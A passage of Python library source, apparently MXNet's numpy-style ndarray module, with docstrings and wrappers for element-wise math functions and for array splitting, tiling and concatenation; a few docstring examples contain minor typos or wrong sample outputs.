The logarithm base two of `x`, element-wise.
This is a scalar if `x` is a scalar.
Notes
-----
This function differs from the original `numpy.log2
<https://www.google.com/search?q=numpy+log2>`_ in
the following way(s):
- only ndarray or scalar is accpted as valid input, tuple of ndarray is not supported
- broadcasting to `out` of different shape is currently not supported
- when input is plain python numerics, the result will not be stored in the `out` param
Examples
--------
>>> x = np.array([0, 1, 2, 2**4])
>>> np.log2(x)
array([-inf, 0., 1., 4.])
"""
return _unary_func_helper(x, _npi.log2, _np.log2, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def log1p(x, out=None, **kwargs):
"""
Return the natural logarithm of one plus the input array, element-wise.
Calculates ``log(1 + x)``.
Parameters
----------
x : ndarray or scalar
Input array.
out : ndarray or None
A location into which the result is stored. If provided, it
must have a shape that the inputs fill into. If not provided
or None, a freshly-allocated array is returned. The dtype of the
output and input must be the same.
Returns
-------
y : ndarray or scalar
Natural logarithm of 1 + x, element-wise. This is a scalar
if x is a scalar.
Notes
-----
For real-valued input, `log1p` is accurate also for `x` so small
that `1 + x == 1` in floating-point accuracy.
Logarithm is a multivalued function: for each `x` there is an infinite
number of `z` such that `exp(z) = 1 + x`. The convention is to return
the `z` whose imaginary part lies in `[-pi, pi]`.
For real-valued input data types, `log1p` always returns real output.
For each value that cannot be expressed as a real number or infinity,
it yields ``nan`` and sets the `invalid` floating point error flag.
cannot support complex-valued input.
Examples
--------
>>> np.log1p(1e-99)
1e-99
>>> a = np.array([3, 4, 5])
>>> np.log1p(a)
array([1.3862944, 1.609438 , 1.7917595])
"""
return _unary_func_helper(x, _npi.log1p, _np.log1p, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def radians(x, out=None, **kwargs):
"""
Convert angles from degrees to radians.
Parameters
----------
x : ndarray or scalar
Input array in degrees.
out : ndarray or None
A location into which the result is stored.
If provided, it must have the same shape and type as the input.
If not provided or None, a freshly-allocated array is returned.
Returns
-------
y : ndarray
The corresponding radian values. This is a scalar if x is a scalar.
Notes
-----
This function differs from the original `numpy.radians
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.radians.html>`_ in
the following way(s):
- only ndarray or scalar is accpted as valid input, tuple of ndarray is not supported
- broadcasting to `out` of different shape is currently not supported
- when input is plain python numerics, the result will not be stored in the `out` param
Examples
--------
>>> deg = np.arange(12.) * 30.
>>> np.radians(deg)
array([0. , 0.5235988, 1.0471976, 1.5707964, 2.0943952, 2.6179938,
3.1415927, 3.6651914, 4.1887903, 4.712389 , 5.2359877, 5.7595863],
dtype=float32)
"""
return _unary_func_helper(x, _npi.radians, _np.radians, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def deg2rad(x, out=None, **kwargs):
r"""
Convert angles from degrees to radians.
Parameters
----------
x : ndarray or scalar
Angles in degrees.
out : ndarray or None, optional
A location into which the result is stored. If not provided or `None`,
a freshly-allocated array is returned.
Returns
-------
y : ndarray or scalar
The corresponding angle in radians.
This is a scalar if `x` is a scalar.
Notes
-----
"deg2rad(x)" is "x * pi / 180".
This function differs from the original numpy.arange in the following aspects:
- Only support float32 and float64.
- `out` must be in the same size of input.
Examples
--------
>>> np.deg2rad(180)
3.1415927
"""
return _unary_func_helper(x, _npi.deg2rad, _np.deg2rad, out=out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def reciprocal(x, out=None, **kwargs):
r"""
Return the reciprocal of the argument, element-wise.
Calculates ``1/x``.
Parameters
----------
x : ndarray or scalar
The values whose reciprocals are required.
out : ndarray or None, optional
A location into which the result is stored.
If provided, it must have the same shape as the input.
If not provided or None, a freshly-allocated array is returned.
Returns
-------
y : ndarray or scalar
Output array is same shape and type as x. This is a scalar if x is a scalar.
Examples
--------
>>> np.reciprocal(2.)
0.5
>>> x = np.array([1, 2., 3.33])
>>> np.reciprocal(x)
array([1. , 0.5 , 0.3003003])
Notes
-----
.. note::
This function is not designed to work with integers.
For integer arguments with absolute value larger than 1 the result is
always zero because of the way Python handles integer division. For
integer zero the result is an overflow.
The output `ndarray` has the same `ctx` as the input `ndarray`.
This function differs from the original `numpy.reciprocal
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.reciprocal.html>`_ in
the following aspects:
- Only support ndarray and scalar now.
- `where` argument is not supported.
"""
return _unary_func_helper(x, _npi.reciprocal, _np.reciprocal, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def square(x, out=None, **kwargs):
r"""
Return the element-wise square of the input.
Parameters
----------
x : ndarray or scalar
The values whose squares are required.
out : ndarray or None, optional
A location into which the result is stored.
If provided, it must have the same shape as the input.
If not provided or None, a freshly-allocated array is returned.
Returns
-------
y : ndarray or scalar
Output array is same shape and type as x. This is a scalar if x is a scalar.
Examples
--------
>>> np.square(2.)
4.0
>>> x = np.array([1, 2., -1])
>>> np.square(x)
array([1., 4., 1.])
Notes
-----
The output `ndarray` has the same `ctx` as the input `ndarray`.
This function differs from the original `numpy.square
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.square.html>`_ in
the following aspects:
- Only support ndarray and scalar now.
- `where` argument is not supported.
- Complex input is not supported.
"""
return _unary_func_helper(x, _npi.square, _np.square, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def negative(x, out=None, **kwargs):
r"""
Numerical negative, element-wise.
Parameters:
------------
x : ndarray or scalar
Input array.
out : ndarray, None, or tuple of ndarray and None, optional
A location into which the result is stored.
Returns:
---------
y : ndarray or scalar
Returned array or scalar: y = -x. This is a scalar if x is a scalar.
Examples:
---------
>>> np.negative(1)
-1
"""
return _unary_func_helper(x, _npi.negative, _np.negative, out=out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def fix(x, out=None, **kwargs):
r"""
Round an array of floats element-wise to nearest integer towards zero.
The rounded values are returned as floats.
Parameters:
----------
x : ndarray
An array of floats to be rounded
out : ndarray, optional
Output array
Returns:
-------
y : ndarray of floats
Examples
---------
>>> np.fix(3.14)
3
"""
return _unary_func_helper(x, _npi.fix, _np.fix, out=out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def tan(x, out=None, **kwargs):
r"""
Compute tangent element-wise.
Equivalent to np.sin(x)/np.cos(x) element-wise.
Parameters:
----------
x : ndarray
Input array.
out : ndarray, None, or tuple of ndarray and None, optional
A location into which the result is stored. If provided,
it must have a shape that the inputs broadcast to. If not provided or None,
a freshly-allocated array is returned. A tuple (possible only as a keyword argument)
must have length equal to the number of outputs.
where : ndarray, optional
Values of True indicate to calculate the ufunc at that position,
values of False indicate to leave the value in the output alone.
Returns:
-------
y : ndarray
The corresponding tangent values. This is a scalar if x is a scalar.
Examples:
---------
>>> np.tan(0.5)
0.5463024898437905
"""
return _unary_func_helper(x, _npi.tan, _np.tan, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def ceil(x, out=None, **kwargs):
r"""
Return the ceiling of the input, element-wise.
The ceil of the ndarray `x` is the smallest integer `i`, such that
`i >= x`. It is often denoted as :math:`\lceil x \rceil`.
Parameters
----------
x : ndarray or scalar
Input array.
out : ndarray or None
A location into which the result is stored. If provided, it
must have a same shape that the inputs fill into. If not provided
or None, a freshly-allocated array is returned. The dtype of the
output and input must be the same.
Returns
-------
y : ndarray or scalar
The ceiling of each element in `x`, with `float` dtype.
This is a scalar if `x` is a scalar.
Examples
--------
>>> a = np.array([-1.7, -1.5, -0.2, 0.2, 1.5, 1.7, 2.0])
>>> np.ceil(a)
array([-1., -1., -0., 1., 2., 2., 2.])
>>> #if you use parameter out, x and out must be ndarray.
>>> a = np.array(1)
>>> np.ceil(np.array(3.5), a)
array(4.)
>>> a
array(4.)
"""
return _unary_func_helper(x, _npi.ceil, _np.ceil, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def floor(x, out=None, **kwargs):
r"""
Return the floor of the input, element-wise.
The floor of the ndarray `x` is the largest integer `i`, such that
`i <= x`. It is often denoted as :math:`\lfloor x \rfloor`.
Parameters
----------
x : ndarray or scalar
Input array.
out : ndarray or None
A location into which the result is stored. If provided, it
must have a same shape that the inputs fill into. If not provided
or None, a freshly-allocated array is returned. The dtype of the
output and input must be the same.
Returns
-------
y : ndarray or scalar
The floor of each element in `x`, with `float` dtype.
This is a scalar if `x` is a scalar.
Examples
--------
>>> a = np.array([-1.7, -1.5, -0.2, 0.2, 1.5, 1.7, 2.0])
>>> np.floor(a)
array([-2., -2., -1., 0., 1., 1., 2.])
>>> #if you use parameter out, x and out must be ndarray.
>>> a = np.array(1)
>>> np.floor(np.array(3.5), a)
array(3.)
>>> a
array(3.)
"""
return _unary_func_helper(x, _npi.floor, _np.floor, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def bitwise_not(x, out=None, **kwargs):
r"""
Compute bit-wise inversion, or bit-wise NOT, element-wise.
Computes the bit-wise NOT of the underlying binary representation of
the integers in the input arrays. This ufunc implements the C/Python
operator ``~``.
Parameters
----------
x : array_like
Only integer and boolean types are handled.
out : ndarray, None, or tuple of ndarray and None, optional
A location into which the result is stored. If provided, it must have
a shape that the inputs broadcast to. If not provided or `None`,
a freshly-allocated array is returned. A tuple (possible only as a
keyword argument) must have length equal to the number of outputs.
Returns
-------
out : ndarray or scalar
Result.
This is a scalar if `x` is a scalar.
See Also
--------
bitwise_and, bitwise_or, bitwise_xor
logical_not
binary_repr :
Return the binary representation of the input number as a string.
Examples
--------
We've seen that 13 is represented by ``00001101``.
The invert or bit-wise NOT of 13 is then:
>>> x = np.invert(np.array(13, dtype=np.uint8))
>>> x
242
>>> np.binary_repr(x, width=8)
'11110010'
Notes
-----
`bitwise_not` is an alias for `invert`:
>>> np.bitwise_not is np.invert
True
"""
return _unary_func_helper(x, _npi.bitwise_not, _np.bitwise_not, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def invert(x, out=None, **kwargs):
r"""
Compute bit-wise inversion, or bit-wise NOT, element-wise.
Computes the bit-wise NOT of the underlying binary representation of
the integers in the input arrays. This ufunc implements the C/Python
operator ``~``.
Parameters
----------
x : array_like
Only integer and boolean types are handled.
out : ndarray, None, or tuple of ndarray and None, optional
A location into which the result is stored. If provided, it must have
a shape that the inputs broadcast to. If not provided or `None`,
a freshly-allocated array is returned. A tuple (possible only as a
keyword argument) must have length equal to the number of outputs.
Returns
-------
out : ndarray or scalar
Result.
This is a scalar if `x` is a scalar.
See Also
--------
bitwise_and, bitwise_or, bitwise_xor
logical_not
binary_repr :
Return the binary representation of the input number as a string.
Examples
--------
We've seen that 13 is represented by ``00001101``.
The invert or bit-wise NOT of 13 is then:
>>> x = np.invert(np.array(13, dtype=np.uint8))
>>> x
242
>>> np.binary_repr(x, width=8)
'11110010'
Notes
-----
`bitwise_not` is an alias for `invert`:
>>> np.bitwise_not is np.invert
True
"""
return _unary_func_helper(x, _npi.bitwise_not, _np.bitwise_not, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def trunc(x, out=None, **kwargs):
r"""
Return the truncated value of the input, element-wise.
The truncated value of the scalar `x` is the nearest integer `i` which
is closer to zero than `x` is. In short, the fractional part of the
signed number `x` is discarded.
Parameters
----------
x : ndarray or scalar
Input data.
out : ndarray or None, optional
A location into which the result is stored.
Returns
-------
y : ndarray or scalar
The truncated value of each element in `x`.
This is a scalar if `x` is a scalar.
Notes
-----
This function differs from the original numpy.trunc in the following aspects:
- Do not support `where`, a parameter in numpy which indicates where to calculate.
- Cannot cast type automatically. Dtype of `out` must be same as the expected one.
- Cannot broadcast automatically. Shape of `out` must be same as the expected one.
- If `x` is plain python numeric, the result won't be stored in out.
Examples
--------
>>> a = np.array([-1.7, -1.5, -0.2, 0.2, 1.5, 1.7, 2.0])
>>> np.trunc(a)
array([-1., -1., -0., 0., 1., 1., 2.])
"""
return _unary_func_helper(x, _npi.trunc, _np.trunc, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def logical_not(x, out=None, **kwargs):
r"""
Compute the truth value of NOT x element-wise.
Parameters
----------
x : ndarray or scalar
Logical NOT is applied to the elements of `x`.
out : ndarray or None, optional
A location into which the result is stored.
Returns
-------
y : bool or ndarray of bool
Boolean result with the same shape as `x` of the NOT operation
on elements of `x`.
This is a scalar if `x` is a scalar.
Notes
-----
This function differs from the original numpy.logical_not in the following aspects:
- Do not support `where`, a parameter in numpy which indicates where to calculate.
- Cannot cast type automatically. Dtype of `out` must be same as the expected one.
- Cannot broadcast automatically. Shape of `out` must be same as the expected one.
- If `x` is plain python numeric, the result won't be stored in out.
Examples
--------
>>> x= np.array([True, False, 0, 1])
>>> np.logical_not(x)
array([False, True, True, False])
>>> x = np.arange(5)
>>> np.logical_not(x<3)
array([False, False, False, True, True])
"""
return _unary_func_helper(x, _npi.logical_not, _np.logical_not, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def arcsinh(x, out=None, **kwargs):
r"""
Inverse hyperbolic sine, element-wise.
Parameters
----------
x : ndarray or scalar
Input array.
out : ndarray or None, optional
A location into which the result is stored.
Returns
-------
arcsinh : ndarray
Array of the same shape as `x`.
This is a scalar if `x` is a scalar.
Notes
-----
`arcsinh` is a multivalued function: for each `x` there are infinitely
many numbers `z` such that `sinh(z) = x`.
For real-valued input data types, `arcsinh` always returns real output.
For each value that cannot be expressed as a real number or infinity, it
yields ``nan`` and sets the `invalid` floating point error flag.
This function differs from the original numpy.arcsinh in the following aspects:
- Do not support `where`, a parameter in numpy which indicates where to calculate.
- Do not support complex-valued input.
- Cannot cast type automatically. DType of `out` must be same as the expected one.
- Cannot broadcast automatically. Shape of `out` must be same as the expected one.
- If `x` is plain python numeric, the result won't be stored in out.
Examples
--------
>>> a = np.array([3.2, 5.0])
>>> np.arcsinh(a)
array([1.8309381, 2.2924316])
>>> np.arcsinh(1)
0.0
"""
return _unary_func_helper(x, _npi.arcsinh, _np.arcsinh, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def arccosh(x, out=None, **kwargs):
r"""
Inverse hyperbolic cosine, element-wise.
Parameters
----------
x : ndarray or scalar
Input array.
out : ndarray or None, optional
A location into which the result is stored.
Returns
-------
arccosh : ndarray
Array of the same shape as `x`.
This is a scalar if `x` is a scalar.
Notes
-----
`arccosh` is a multivalued function: for each `x` there are infinitely
many numbers `z` such that `cosh(z) = x`.
For real-valued input data types, `arccosh` always returns real output.
For each value that cannot be expressed as a real number or infinity, it
yields ``nan`` and sets the `invalid` floating point error flag.
This function differs from the original numpy.arccosh in the following aspects:
- Do not support `where`, a parameter in numpy which indicates where to calculate.
- Do not support complex-valued input.
- Cannot cast type automatically. Dtype of `out` must be same as the expected one.
- Cannot broadcast automatically. Shape of `out` must be same as the expected one.
- If `x` is plain python numeric, the result won't be stored in out.
Examples
--------
>>> a = np.array([3.2, 5.0])
>>> np.arccosh(a)
array([1.8309381, 2.2924316])
>>> np.arccosh(1)
0.0
"""
return _unary_func_helper(x, _npi.arccosh, _np.arccosh, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def arctanh(x, out=None, **kwargs):
r"""
Inverse hyperbolic tangent, element-wise.
Parameters
----------
x : ndarray or scalar
Input array.
out : ndarray or None, optional
A location into which the result is stored.
Returns
-------
arctanh : ndarray
Array of the same shape as `x`.
This is a scalar if `x` is a scalar.
Notes
-----
`arctanh` is a multivalued function: for each `x` there are infinitely
many numbers `z` such that `tanh(z) = x`.
For real-valued input data types, `arctanh` always returns real output.
For each value that cannot be expressed as a real number or infinity, it
yields ``nan`` and sets the `invalid` floating point error flag.
This function differs from the original numpy.arctanh in the following aspects:
- Do not support `where`, a parameter in numpy which indicates where to calculate.
- Do not support complex-valued input.
- Cannot cast type automatically. Dtype of `out` must be same as the expected one.
- Cannot broadcast automatically. Shape of `out` must be same as the expected one.
- If `x` is plain python numeric, the result won't be stored in out.
Examples
--------
>>> a = np.array([0.0, -0.5])
>>> np.arctanh(a)
array([0., -0.54930615])
>>> np.arctanh(0.0)
0.0
"""
return _unary_func_helper(x, _npi.arctanh, _np.arctanh, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
def tile(A, reps):
r"""
Construct an array by repeating A the number of times given by reps.
If `reps` has length ``d``, the result will have dimension of
``max(d, A.ndim)``.
If ``A.ndim < d``, `A` is promoted to be d-dimensional by prepending new
axes. So a shape (3,) array is promoted to (1, 3) for 2-D replication,
or shape (1, 1, 3) for 3-D replication. If this is not the desired
behavior, promote `A` to d-dimensions manually before calling this
function.
If ``A.ndim > d``, `reps` is promoted to `A`.ndim by pre-pending 1's to it.
Thus for an `A` of shape (2, 3, 4, 5), a `reps` of (2, 2) is treated as
(1, 1, 2, 2).
Parameters
----------
A : ndarray or scalar
An input array or a scalar to repeat.
reps : a single integer or tuple of integers
The number of repetitions of `A` along each axis.
Returns
-------
c : ndarray
The tiled output array.
Examples
--------
>>> a = np.array([0, 1, 2])
>>> np.tile(a, 2)
array([0., 1., 2., 0., 1., 2.])
>>> np.tile(a, (2, 2))
array([[0., 1., 2., 0., 1., 2.],
[0., 1., 2., 0., 1., 2.]])
>>> np.tile(a, (2, 1, 2))
array([[[0., 1., 2., 0., 1., 2.]],
[[0., 1., 2., 0., 1., 2.]]])
>>> b = np.array([[1, 2], [3, 4]])
>>> np.tile(b, 2)
array([[1., 2., 1., 2.],
[3., 4., 3., 4.]])
>>> np.(b, (2, 1))
array([[1., 2.],
[3., 4.],
[1., 2.],
[3., 4.]])
>>> c = np.array([1,2,3,4])
>>> np.tile(c,(4,1))
array([[1., 2., 3., 4.],
[1., 2., 3., 4.],
[1., 2., 3., 4.],
[1., 2., 3., 4.]])
Scalar as input:
>>> np.tile(2, 3)
array([2, 2, 2]) # repeating integer `2`
"""
return _unary_func_helper(A, _npi.tile, _np.tile, reps=reps)
# pylint: disable=redefined-outer-name
@set_module('mxnet.ndarray.numpy')
def split(ary, indices_or_sections, axis=0):
"""
Split an array into multiple sub-arrays.
Parameters
----------
ary : ndarray
Array to be divided into sub-arrays.
indices_or_sections : int or 1-D python tuple, list or set.
If `indices_or_sections` is an integer, N, the array will be divided
into N equal arrays along `axis`. If such a split is not possible,
an error is raised.
If `indices_or_sections` is a 1-D array of sorted integers, the entries
indicate where along `axis` the array is split. For example,
``[2, 3]`` would, for ``axis=0``, result in
- ary[:2]
- ary[2:3]
- ary[3:]
If an index exceeds the dimension of the array along `axis`,
an empty sub-array is returned correspondingly.
axis : int, optional
The axis along which to split, default is 0.
Returns
-------
sub-arrays : list of ndarrays
A list of sub-arrays.
Raises
------
ValueError
If `indices_or_sections` is given as an integer, but
a split does not result in equal division.
"""
axis_size = ary.shape[axis]
if isinstance(indices_or_sections, integer_types):
sections = indices_or_sections
if axis_size % sections:
raise ValueError('array split does not result in an equal division')
section_size = int(axis_size / sections)
indices = [i * section_size for i in range(sections)]
elif isinstance(indices_or_sections, (list, set, tuple)):
indices = [0] + list(indices_or_sections)
else:
raise ValueError('indices_or_sections must be either int, or tuple / list / set of ints')
ret = _npi.split(ary, indices, axis, False)
assert isinstance(ret, list), 'Output of split should be list,' \
' got a return type {}'.format(type(ret))
return ret
# pylint: enable=redefined-outer-name
# pylint: disable=redefined-outer-name
@set_module('mxnet.ndarray.numpy')
def array_split(ary, indices_or_sections, axis=0):
"""Split an array into multiple sub-arrays.
If `indices_or_sections` is an integer, N, the array will be divided
into N equal arrays along `axis`. If such a split is not possible,
an array of length l that should be split into n sections, it returns
l % n sub-arrays of size l//n + 1 and the rest of size l//n.
If `indices_or_sections` is a 1-D array of sorted integers, the entries
indicate where along `axis` the array is split. For example,
``[2, 3]`` would, for ``axis=0``, result in
- ary[:2]
- ary[2:3]
- ary[3:]
If an index exceeds the dimension of the array along `axis`,
an empty sub-array is returned correspondingly.
Parameters
----------
ary : ndarray
Array to be divided into sub-arrays.
indices_or_sections : int or 1-D Python tuple, list or set.
Param used to determine the number and size of the subarray.
axis : int, optional
The axis along which to split, default is 0.
Returns
-------
sub-arrays : list of ndarrays
A list of sub-arrays.
Examples
--------
>>> x = np.arange(9.0)
>>> np.array_split(x, 3)
[array([0., 1., 2.]), array([3., 4., 5.]), array([6., 7., 8.])]
>>> np.array_split(x, [3, 5, 6, 8])
[array([0., 1., 2.]), array([3., 4.]), array([5.]), array([6., 7.]), array([])]
>>> x = np.arange(8.0)
>>> np.array_split(x, 3)
[array([0., 1., 2.]), array([3., 4., 5.]), array([6., 7.])]
>>> x = np.arange(7.0)
>>> np.array_split(x, 3)
[array([0., 1., 2.]), array([3., 4.]), array([5., 6.])]
"""
indices = []
sections = 0
if isinstance(indices_or_sections, integer_types):
sections = indices_or_sections
elif isinstance(indices_or_sections, (list, set, tuple)):
indices = [0] + list(indices_or_sections)
else:
raise ValueError('indices_or_sections must be either int, or tuple / list / set of ints')
ret = _npi.split(ary, indices, axis, False, sections)
if not isinstance(ret, list):
return [ret]
return ret
# pylint: enable=redefined-outer-name
# pylint: disable=redefined-outer-name
@set_module('mxnet.ndarray.numpy')
def hsplit(ary, indices_or_sections):
"""Split an array into multiple sub-arrays horizontally (column-wise).
This is equivalent to ``split`` with ``axis=0`` if ``ary`` has one
dimension, and otherwise that with ``axis=1``.
Parameters
----------
ary : ndarray
Array to be divided into sub-arrays.
indices_or_sections : int, list of ints or tuple of ints.
If `indices_or_sections` is an integer, N, the array will be divided
into N equal arrays along `axis`. If such a split is not possible,
an error is raised.
If `indices_or_sections` is a list of sorted integers, the entries
indicate where along `axis` the array is split.
If an index exceeds the dimension of the array along `axis`,
it will raises errors. so index must less than or euqal to
the dimension of the array along axis.
Returns
-------
sub-arrays : list of ndarrays
A list of sub-arrays.
Notes
------
- If `indices_or_sections` is given as an integer, but a split
does not result in equal division.It will raises ValueErrors.
- If indices_or_sections is an integer, and the number is 1, it will
raises an error. Because single output from split is not supported yet...
See Also
--------
split : Split an array into multiple sub-arrays of equal size.
Examples
--------
>>> x = np.arange(16.0).reshape(4, 4)
>>> x
array([[ 0., 1., 2., 3.],
[ 4., 5., 6., 7.],
[ 8., 9., 10., 11.],
[12., 13., 14., 15.]])
>>> np.hsplit(x, 2)
[array([[ 0., 1.],
[ 4., 5.],
[ 8., 9.],
[12., 13.]]),
array([[ 2., 3.],
[ 6., 7.],
[10., 11.],
[14., 15.]])]
>>> np.hsplit(x, [3, 6])
[array([[ 0., 1., 2.],
[ 4., 5., 6.],
[ 8., 9., 10.],
[12., 13., 14.]]),
array([[ 3.],
[ 7.],
[11.],
[15.]]),
array([], shape=(4, 0), dtype=float32)]
With a higher dimensional array the split is still along the second axis.
>>> x = np.arange(8.0).reshape(2, 2, 2)
>>> x
array([[[ 0., 1.],
[ 2., 3.]],
[[ 4., 5.],
[ 6., 7.]]])
>>> np.hsplit(x, 2)
[array([[[ 0., 1.]],
[[ 4., 5.]]]),
array([[[ 2., 3.]],
[[ 6., 7.]]])]
If ``ary`` has one dimension, 'axis' = 0.
>>> x = np.arange(4)
array([0., 1., 2., 3.])
>>> np.hsplit(x, 2)
[array([0., 1.]), array([2., 3.])]
If you want to produce an empty sub-array, you can see an example.
>>> np.hsplit(x, [2, 2])
[array([0., 1.]), array([], dtype=float32), array([2., 3.])]
"""
if len(ary.shape) < 1:
raise ValueError('hsplit only works on arrays of 1 or more dimensions')
indices = []
sections = 0
if isinstance(indices_or_sections, integer_types):
sections = indices_or_sections
elif isinstance(indices_or_sections, (list, set, tuple)):
indices = [0] + list(indices_or_sections)
else:
raise ValueError('indices_or_sections must be either int, or tuple / list / set of ints')
ret = _npi.hsplit(ary, indices, 1, False, sections)
if not isinstance(ret, list):
return [ret]
return ret
# pylint: enable=redefined-outer-name
@set_module('mxnet.ndarray.numpy')
def vsplit(ary, indices_or_sections):
r"""
vsplit(ary, indices_or_sections)
Split an array into multiple sub-arrays vertically (row-wise).
``vsplit`` is equivalent to ``split`` with `axis=0` (default): the array is always split
along the first axis regardless of the array dimension.
Parameters
----------
ary : ndarray
Array to be divided into sub-arrays.
indices_or_sections : int or 1 - D Python tuple, list or set.
If `indices_or_sections` is an integer, N, the array will be divided into N equal arrays
along axis 0. If such a split is not possible, an error is raised.
If `indices_or_sections` is a 1-D array of sorted integers, the entries indicate where
along axis 0 the array is split. For example, ``[2, 3]`` would result in
- ary[:2]
- ary[2:3]
- ary[3:]
If an index exceeds the dimension of the array along axis 0, an error will be thrown.
Returns
-------
sub-arrays : list of ndarrays
A list of sub-arrays.
See Also
--------
split : Split an array into multiple sub-arrays of equal size.
Notes
-------
This function differs from the original `numpy.degrees
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.degrees.html>`_ in
the following aspects:
- Currently parameter ``indices_or_sections`` does not support ndarray, but supports scalar,
tuple and list.
- In ``indices_or_sections``, if an index exceeds the dimension of the array along axis 0,
an error will be thrown.
Examples
--------
>>> x = np.arange(16.0).reshape(4, 4)
>>> x
array([[ 0., 1., 2., 3.],
[ 4., 5., 6., 7.],
[ 8., 9., 10., 11.],
[ 12., 13., 14., 15.]])
>>> np.vsplit(x, 2)
[array([[0., 1., 2., 3.],
[4., 5., 6., 7.]]), array([[ 8., 9., 10., 11.],
[12., 13., 14., 15.]])]
With a higher dimensional array the split is still along the first axis.
>>> x = np.arange(8.0).reshape(2, 2, 2)
>>> x
array([[[ 0., 1.],
[ 2., 3.]],
[[ 4., 5.],
[ 6., 7.]]])
>>> np.vsplit(x, 2)
[array([[[0., 1.],
[2., 3.]]]), array([[[4., 5.],
[6., 7.]]])]
"""
if len(ary.shape) < 2:
raise ValueError("vsplit only works on arrays of 2 or more dimensions")
return split(ary, indices_or_sections, 0)
# pylint: disable=redefined-outer-name
@set_module('mxnet.ndarray.numpy')
def dsplit(ary, indices_or_sections):
"""
Split array into multiple sub-arrays along the 3rd axis (depth).
Please refer to the `split` documentation. `dsplit` is equivalent
to `split` with ``axis=2``, the array is always split along the third
axis provided the array dimension is greater than or equal to 3.
Parameters
----------
ary : ndarray
Array to be divided into sub-arrays.
indices_or_sections : int or 1 - D Python tuple, list or set.
If `indices_or_sections` is an integer, N, the array will be divided into N equal arrays
along axis 2. If such a split is not possible, an error is raised.
If `indices_or_sections` is a 1-D array of sorted integers, the entries indicate where
along axis 2 the array is split. For example, ``[2, 3]`` would result in
- ary[:, :, :2]
- ary[:, :, 2:3]
- ary[:, :, 3:]
If an index exceeds the dimension of the array along axis 2, an error will be thrown.
Examples
--------
>>> x = np.arange(16.0).reshape(2, 2, 4)
>>> x
array([[[ 0., 1., 2., 3.],
[ 4., 5., 6., 7.]],
[[ 8., 9., 10., 11.],
[12., 13., 14., 15.]]])
>>> np.dsplit(x, 2)
[array([[[ 0., 1.],
[ 4., 5.]],
[[ 8., 9.],
[12., 13.]]]), array([[[ 2., 3.],
[ 6., 7.]],
[[10., 11.],
[14., 15.]]])]
>>> np.dsplit(x, np.array([3, 6]))
[array([[[ 0., 1., 2.],
[ 4., 5., 6.]],
[[ 8., 9., 10.],
[12., 13., 14.]]]),
array([[[ 3.],
[ 7.]],
[[11.],
[15.]]]),
array([], shape=(2, 2, 0), dtype=float64)]
"""
if len(ary.shape) < 3:
raise ValueError('dsplit only works on arrays of 3 or more dimensions')
return split(ary, indices_or_sections, 2)
# pylint: enable=redefined-outer-name
@set_module('mxnet.ndarray.numpy')
def concatenate(seq, axis=0, out=None):
"""
Join a sequence of arrays along an existing axis.
Parameters
----------
a1, a2, ... : sequence of ndarray
The arrays must have the same shape, except in the dimension
corresponding to `axis` (the first, by default).
axis : int, optional
The axis along which the arrays will be joined. If axis is None,
arrays are flattened before use. Default is 0.
out : ndarray, optional
If provided, the destination to place the result. The shape must be
correct, matching that of what concatenate would have returned if no
out argument were specified.
Returns
-------
res : ndarray
The concatenated array.
Examples
--------
>>> a = np.array([[1, 2], [3, 4]])
>>> b = np.array([[5, 6]])
>>> np.concatenate((a, b), axis=0)
array([[1., 2.],
[3., 4.],
[5., 6.]])
>>> np.concatenate((a, b), axis=None)
array([1., 2., 3., 4., 5., 6.])
>>> np.concatenate((a, b.T), axis=1)
array([[1., 2., 5.],
[3., 4., 6.]])
"""
return _npi.concatenate(*seq, axis=axis, out=out)
@set_module('mxnet.ndarray.numpy')
def append(arr, values, axis=None): # pylint: disable=redefined-outer-name
"""
Append values to the end of an array.
Parameters
----------
arr : ndarray
Values are appended to a copy of this array.
values : ndarray
These values are appended to a copy of `arr`. It must be of the
correct shape (the same shape as `arr`, excluding `axis`). If
`axis` is not specified, `values` can be any shape and will be
flattened before use.
axis : int, optional
The axis along which `values` are appended. If `axis` is not
given, both `arr` and `values` are flattened before use.
Returns
-------
append : ndarray
A copy of `arr` with `values` appended to `axis`. Note that
`append` does not occur in-place: a new array is allocated and
filled. If `axis` is None, `out` is a flattened array.
Examples
--------
>>> np.append(np.array([1, 2, 3]), np.array([[4, 5, 6],[7, 8, 9]]))
array([1., 2., 3., 4., 5., 6., 7., 8., 9.])
When `axis` is specified, `values` must have the correct shape.
>>> np.append(np.array([[1, 2, 3], [4, 5, 6]]), np.array([[7, 8, 9]]), axis=0)
array([[1., 2., 3.],
[4., 5., 6.],
[7., 8., 9.]])
"""
return _npi.concatenate(arr, values, axis=axis, out=None)
@set_module('mxnet.ndarray.numpy')
def stack(arrays, axis=0, out=None):
"""Join a sequence of arrays along a new axis.
The axis parameter specifies the index of the new axis in the dimensions of the result.
For example, if `axis=0` it will be the first dimension and if `axis=-1` it will be the last dimension.
Parameters
----------
arrays : sequence of ndarray
Each array must have the same shape.
axis : int, optional
The axis in the result array along which the input arrays are stacked.
out : ndarray, optional
